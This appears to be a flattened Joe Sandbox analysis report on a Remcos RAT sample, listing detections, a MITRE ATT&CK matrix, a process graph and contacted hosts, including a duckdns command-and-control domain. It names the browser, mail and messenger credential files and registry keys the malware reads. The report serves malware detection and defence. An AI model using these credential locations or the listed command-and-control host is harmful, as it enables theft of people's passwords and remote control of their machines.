                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.34f9970.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000009.00000002.4487423704.0000000001130000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2097259168.00000000014D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2081908581.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe PID: 5328, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe PID: 7308, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: mXJeXQoaGktJCW.exe PID: 7692, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\dfgh\logs.dat, type: DROPPED
                    Contains functionality to steal Chrome passwords or cookies
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data15_2_0040BA4D
                    Contains functionality to steal Firefox passwords or cookies
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\15_2_0040BB6B
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: \key3.db15_2_0040BB6B
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Tries to steal Instant Messenger accounts or passwords
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeKey opened: HKEY_CURRENT_USER\Software\Paltalk
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                    Tries to steal Mail credentials (via file registry)
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: ESMTPPassword19_2_004033F0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword19_2_00402DB3
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword19_2_00402DB3
                    Yara detected WebBrowserPassView password recovery tool
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe PID: 7776, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Detected Remcos RAT
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-7XAUXHJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-7XAUXH
                    Yara detected Remcos RAT
                    Source: Yara matchFile source: 15.2.mXJeXQoaGktJCW.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.3572390.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.mXJeXQoaGktJCW.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.34f9970.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.3572390.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.34f9970.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000009.00000002.4487423704.0000000001130000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2097259168.00000000014D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2081908581.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe PID: 5328, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe PID: 7308, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: mXJeXQoaGktJCW.exe PID: 7692, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\dfgh\logs.dat, type: DROPPED
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: cmd.exe15_2_0040569A

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                    Native API                    		1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		11
                    Disable or Modify Tools                    		2
                    OS Credential Dumping                    		2
                    System Time Discovery                    		Remote Services11
                    Archive Collected Data                    		12
                    Ingress Tool Transfer                    		Exfiltration Over Other Network Medium1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault Accounts12
                    Command and Scripting Interpreter                    		1
                    Windows Service                    		1
                    Bypass User Account Control                    		1
                    Deobfuscate/Decode Files or Information                    		211
                    Input Capture                    		1
                    Account Discovery                    		Remote Desktop Protocol1
                    Data from Local System                    		2
                    Encrypted Channel                    		Exfiltration Over Bluetooth1
                    Defacement
                    Email AddressesDNS ServerDomain Accounts1
                    Scheduled Task/Job                    		1
                    Scheduled Task/Job                    		1
                    Access Token Manipulation                    		4
                    Obfuscated Files or Information                    		2
                    Credentials in Registry                    		1
                    System Service Discovery                    		SMB/Windows Admin Shares1
                    Email Collection                    		1
                    Non-Standard Port                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal Accounts2
                    Service Execution                    		Login Hook1
                    Windows Service                    		12
                    Software Packing                    		3
                    Credentials In Files                    		3
                    File and Directory Discovery                    		Distributed Component Object Model211
                    Input Capture                    		1
                    Remote Access Software                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script222
                    Process Injection                    		1
                    DLL Side-Loading                    		LSA Secrets38
                    System Information Discovery                    		SSH3
                    Clipboard Data                    		2
                    Non-Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                    Scheduled Task/Job                    		1
                    Bypass User Account Control                    		Cached Domain Credentials141
                    Security Software Discovery                    		VNCGUI Input Capture22
                    Application Layer Protocol                    		Data Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Masquerading                    		DCSync31
                    Virtualization/Sandbox Evasion                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
                    Virtualization/Sandbox Evasion                    		Proc Filesystem4
                    Process Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                    Access Token Manipulation                    		/etc/passwd and /etc/shadow1
                    Application Window Discovery                    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron222
                    Process Injection                    		Network Sniffing1
                    System Owner/User Discovery                    		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1544039 Sample: SecuriteInfo.com.W32.MSIL_K... Startdate: 28/10/2024 Architecture: WINDOWS Score: 100 60 bubemoney7221.duckdns.org 2->60 62 geoplugin.net 2->62 76 Suricata IDS alerts for network traffic 2->76 78 Found malware configuration 2->78 80 Malicious sample detected (through community Yara rule) 2->80 84 13 other signatures 2->84 8 SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe 7 2->8         started        12 mXJeXQoaGktJCW.exe 5 2->12         started        signatures3 82 Uses dynamic DNS services 60->82 process4 file5 50 C:\Users\user\AppData\...\mXJeXQoaGktJCW.exe, PE32 8->50 dropped 52 C:\...\mXJeXQoaGktJCW.exe:Zone.Identifier, ASCII 8->52 dropped 54 C:\Users\user\AppData\Local\...\tmp8E60.tmp, XML 8->54 dropped 56 SecuriteInfo.com.W...16672.23413.exe.log, ASCII 8->56 dropped 86 Tries to steal Mail credentials (via file registry) 8->86 88 Uses schtasks.exe or at.exe to add and modify task schedules 8->88 90 Adds a directory exclusion to Windows Defender 8->90 92 Injects a PE file into a foreign processes 8->92 14 SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe 3 15 8->14         started        19 powershell.exe 23 8->19         started        21 powershell.exe 23 8->21         started        23 schtasks.exe 1 8->23         started        94 Antivirus detection for dropped file 12->94 96 Multi AV Scanner detection for dropped file 12->96 98 Contains functionality to bypass UAC (CMSTPLUA) 12->98 100 6 other signatures 12->100 25 mXJeXQoaGktJCW.exe 12->25         started        27 schtasks.exe 12->27         started        29 mXJeXQoaGktJCW.exe 12->29         started        signatures6 process7 dnsIp8 64 bubemoney7221.duckdns.org 103.186.117.77, 2404, 49712, 49713 AARNET-AS-APAustralianAcademicandResearchNetworkAARNe unknown 14->64 66 geoplugin.net 178.237.33.50, 49714, 80 ATOM86-ASATOM86NL Netherlands 14->66 58 C:\ProgramData\dfgh\logs.dat, data 14->58 dropped 68 Detected Remcos RAT 14->68 70 Maps a DLL or memory area into another process 14->70 72 Installs a global keyboard hook 14->72 31 SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe 14->31         started        34 SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe 14->34         started        36 SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe 14->36         started        48 2 other processes 14->48 74 Loading BitLocker PowerShell Module 19->74 38 conhost.exe 19->38         started        40 WmiPrvSE.exe 19->40         started        42 conhost.exe 21->42         started        44 conhost.exe 23->44         started        46 conhost.exe 27->46         started        file9 signatures10 process11 signatures12 102 Tries to steal Instant Messenger accounts or passwords 31->102 104 Tries to steal Mail credentials (via file / registry access) 31->104 106 Tries to harvest and steal browser information (history, passwords, etc) 34->106

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe24%ReversingLabs
                    SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe100%AviraHEUR/AGEN.1362875
                    SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe100%AviraHEUR/AGEN.1362875
                    C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe24%ReversingLabs

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://geoplugin.net/json.gp0%URL Reputationsafe
                    http://www.imvu.comr0%URL Reputationsafe
                    http://geoplugin.net/json.gp/C0%URL Reputationsafe
                    http://www.imvu.com0%URL Reputationsafe
                    https://login.yahoo.com/config/login0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    https://www.chiark.greenend.org.uk/~sgtatham/putty/00%URL Reputationsafe
                    http://www.ebuddy.com0%URL Reputationsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    bubemoney7221.duckdns.org
                    		103.186.117.77
                    		truetrue
                      		unknown
                      geoplugin.net
                      		178.237.33.50
                      		truefalse
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://geoplugin.net/json.gpfalse
                        • URL Reputation: safe
                        		unknown
                        bubemoney7221.duckdns.orgtrue
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://www.google.comSecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000014.00000002.2135059632.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                            		unknown
                            http://www.imvu.comrSecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000014.00000002.2135059632.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://geoplugin.net/SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000009.00000002.4487423704.0000000001196000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              http://geoplugin.net/json.gp/CSecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000000.00000002.2081908581.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, mXJeXQoaGktJCW.exe, 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://geoplugin.net/json.gpjSecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000009.00000002.4487423704.0000000001187000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                http://geoplugin.net/json.gpNSecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000009.00000002.4487423704.0000000001196000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  http://www.imvu.comSecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000014.00000002.2135059632.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://www.google.com/accounts/serviceloginSecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exefalse
                                    		unknown
                                    https://login.yahoo.com/config/loginSecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exefalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.nirsoft.netSecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000011.00000002.2142038542.0000000001384000.00000004.00000010.00020000.00000000.sdmpfalse
                                      		unknown
                                      http://www.nirsoft.net/SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000014.00000002.2135059632.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                        		unknown
                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameSecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000000.00000002.2081220556.000000000252A000.00000004.00000800.00020000.00000000.sdmp, mXJeXQoaGktJCW.exe, 0000000A.00000002.2120600305.0000000003349000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://www.chiark.greenend.org.uk/~sgtatham/putty/0SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, mXJeXQoaGktJCW.exe.0.drfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://geoplugin.net/json.gpSystem32SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000009.00000002.4487423704.0000000001196000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comSecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000014.00000002.2135059632.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                            		unknown
                                            http://www.ebuddy.comSecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000014.00000002.2135059632.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown

                                            World Map of Contacted IPs

                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs

                                            Public IPs

                                            IPDomainCountryFlagASNASN NameMalicious
                                            178.237.33.50
                                            		geoplugin.netNetherlands
                                            		8455ATOM86-ASATOM86NLfalse
                                            103.186.117.77
                                            		bubemoney7221.duckdns.orgunknown
                                            		7575AARNET-AS-APAustralianAcademicandResearchNetworkAARNetrue

                                            General Information

                                            Joe Sandbox version:41.0.0 Charoite
                                            Analysis ID:1544039
                                            Start date and time:2024-10-28 18:36:11 +01:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 10m 22s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Number of analysed new started processes analysed:23
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe
                                            Detection:MAL
                                            Classification:mal100.rans.phis.troj.spyw.expl.evad.winEXE@31/19@3/2
                                            EGA Information:
                                            • Successful, ratio: 100%
                                            HCA Information:
                                            • Successful, ratio: 99%
                                            • Number of executed functions: 178
                                            • Number of non-executed functions: 316
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe
                                            • Override analysis time to 240000 for current running targets taking high CPU consumption

                                            Warnings

                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, otelrules.azureedge.net, fe3cr.delivery.mp.microsoft.com
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                            • Report size getting too big, too many NtCreateKey calls found.
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                            • VT rate limit hit for: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe

                                            Simulations

                                            Behavior and APIs

                                            TimeTypeDescription
                                            13:36:59API Interceptor7099730x Sleep call for process: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe modified
                                            13:37:02API Interceptor38x Sleep call for process: powershell.exe modified
                                            13:37:05API Interceptor3x Sleep call for process: mXJeXQoaGktJCW.exe modified
                                            18:37:03Task SchedulerRun new task: mXJeXQoaGktJCW path: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe

                                            Joe Sandbox View / Context

                                            IPs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            178.237.33.50Lista produkt#U00f3w POL56583753Sarchmentdoc.batGet hashmaliciousRemcos, GuLoaderBrowse
                                            • geoplugin.net/json.gp
                                            odthings.docGet hashmaliciousRemcosBrowse
                                            • geoplugin.net/json.gp
                                            sheisverynicegirlwithgreatworkingskillwithgereatniceworkign.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                            • geoplugin.net/json.gp
                                            withbest.docGet hashmaliciousRemcosBrowse
                                            • geoplugin.net/json.gp
                                            1730032807b4b05f98bfde8f6276448daba1a23755e9c274c194747a0e2092fa87b9491fd0424.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                            • geoplugin.net/json.gp
                                            43655- Urgent - Request for Quotation.exeGet hashmaliciousRemcosBrowse
                                            • geoplugin.net/json.gp
                                            Supplier Purchase Order - PO0002491.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                            • geoplugin.net/json.gp
                                            SecuriteInfo.com.W32.MSIL_Kryptik.KMZ.gen.Eldorado.27390.3879.exeGet hashmaliciousRemcosBrowse
                                            • geoplugin.net/json.gp
                                            Belialist.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                            • geoplugin.net/json.gp
                                            #PO247762.docxGet hashmaliciousRemcosBrowse
                                            • geoplugin.net/json.gp
                                            103.186.117.77QUOTE.exeGet hashmaliciousRemcosBrowse
                                              Quote.exeGet hashmaliciousRemcosBrowse
                                                Quote.exeGet hashmaliciousRemcosBrowse
                                                  Quote.exeGet hashmaliciousRemcosBrowse
                                                    Quote.exeGet hashmaliciousRemcosBrowse
                                                      QUOTATION.exeGet hashmaliciousRemcosBrowse
                                                        Contracts1.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                          Contract1348.batGet hashmaliciousRemcos, DBatLoaderBrowse

                                                            Domains

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            geoplugin.netLista produkt#U00f3w POL56583753Sarchmentdoc.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                            • 178.237.33.50
                                                            odthings.docGet hashmaliciousRemcosBrowse
                                                            • 178.237.33.50
                                                            sheisverynicegirlwithgreatworkingskillwithgereatniceworkign.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                            • 178.237.33.50
                                                            withbest.docGet hashmaliciousRemcosBrowse
                                                            • 178.237.33.50
                                                            1730032807b4b05f98bfde8f6276448daba1a23755e9c274c194747a0e2092fa87b9491fd0424.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                            • 178.237.33.50
                                                            43655- Urgent - Request for Quotation.exeGet hashmaliciousRemcosBrowse
                                                            • 178.237.33.50
                                                            Supplier Purchase Order - PO0002491.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                            • 178.237.33.50
                                                            SecuriteInfo.com.W32.MSIL_Kryptik.KMZ.gen.Eldorado.27390.3879.exeGet hashmaliciousRemcosBrowse
                                                            • 178.237.33.50
                                                            Belialist.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                            • 178.237.33.50
                                                            #PO247762.docxGet hashmaliciousRemcosBrowse
                                                            • 178.237.33.50

                                                            ASNs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            ATOM86-ASATOM86NLLista produkt#U00f3w POL56583753Sarchmentdoc.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                            • 178.237.33.50
                                                            odthings.docGet hashmaliciousRemcosBrowse
                                                            • 178.237.33.50
                                                            sheisverynicegirlwithgreatworkingskillwithgereatniceworkign.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                            • 178.237.33.50
                                                            withbest.docGet hashmaliciousRemcosBrowse
                                                            • 178.237.33.50
                                                            1730032807b4b05f98bfde8f6276448daba1a23755e9c274c194747a0e2092fa87b9491fd0424.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                            • 178.237.33.50
                                                            43655- Urgent - Request for Quotation.exeGet hashmaliciousRemcosBrowse
                                                            • 178.237.33.50
                                                            Supplier Purchase Order - PO0002491.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                            • 178.237.33.50
                                                            SecuriteInfo.com.W32.MSIL_Kryptik.KMZ.gen.Eldorado.27390.3879.exeGet hashmaliciousRemcosBrowse
                                                            • 178.237.33.50
                                                            Belialist.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                            • 178.237.33.50
                                                            #PO247762.docxGet hashmaliciousRemcosBrowse
                                                            • 178.237.33.50
                                                            AARNET-AS-APAustralianAcademicandResearchNetworkAARNehttps://startuppro.wethemez.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPVVXdzRVWEk9JnVpZD1VU0VSMjExMDIwMjRVNTIxMDIxNTI=N0123Get hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                            • 103.187.22.30
                                                            la.bot.mipsel.elfGet hashmaliciousUnknownBrowse
                                                            • 150.203.238.120
                                                            la.bot.m68k.elfGet hashmaliciousUnknownBrowse
                                                            • 103.240.0.97
                                                            la.bot.arm.elfGet hashmaliciousUnknownBrowse
                                                            • 103.172.4.125
                                                            nklm68k.elfGet hashmaliciousUnknownBrowse
                                                            • 103.160.103.136
